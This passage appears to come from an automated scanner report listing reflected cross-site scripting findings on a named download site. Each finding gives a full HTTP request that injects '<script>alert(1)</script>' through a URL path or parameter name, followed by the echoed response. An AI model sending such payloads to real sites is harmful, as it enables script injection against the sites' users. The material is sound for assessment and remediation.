Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402" />
...[SNIP]...

4.1552. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8218"><script>alert(1)</script>80184a44002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1" />
...[SNIP]...

4.1553. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ec5"><script>alert(1)</script>f58c4ad49c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2" />
...[SNIP]...

4.1554. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6397"><script>alert(1)</script>35e6393fe11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1" />
...[SNIP]...

4.1555. http://www.x64bitdownload.com/64-bit-news-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621e6"><script>alert(1)</script>f97e27d071e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e" />
...[SNIP]...

4.1556. http://www.x64bitdownload.com/64-bit-news-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84391"><script>alert(1)</script>fc16f13d74f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87025


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1" />
...[SNIP]...

4.1557. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea20"><script>alert(1)</script>0c390275c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94458


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86" />
...[SNIP]...

4.1558. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db679"><script>alert(1)</script>d820eccf371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94461


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1" />
...[SNIP]...

4.1559. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bcf"><script>alert(1)</script>e2a44662479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479" />
...[SNIP]...

4.1560. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2049a"><script>alert(1)</script>3be85d0325f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1" />
...[SNIP]...

4.1561. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0f0"><script>alert(1)</script>db92b86c3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df" />
...[SNIP]...

4.1562. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2749"><script>alert(1)</script>451987c9093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1" />
...[SNIP]...

4.1563. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 822b0"><script>alert(1)</script>c828d960a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76134


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93" />
...[SNIP]...

4.1564. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e37"><script>alert(1)</script>5191ca0d343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1" />
...[SNIP]...

4.1565. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568b0"><script>alert(1)</script>8a53e952c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31428


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4" />
...[SNIP]...

4.1566. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf61"><script>alert(1)</script>fa8586d080a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
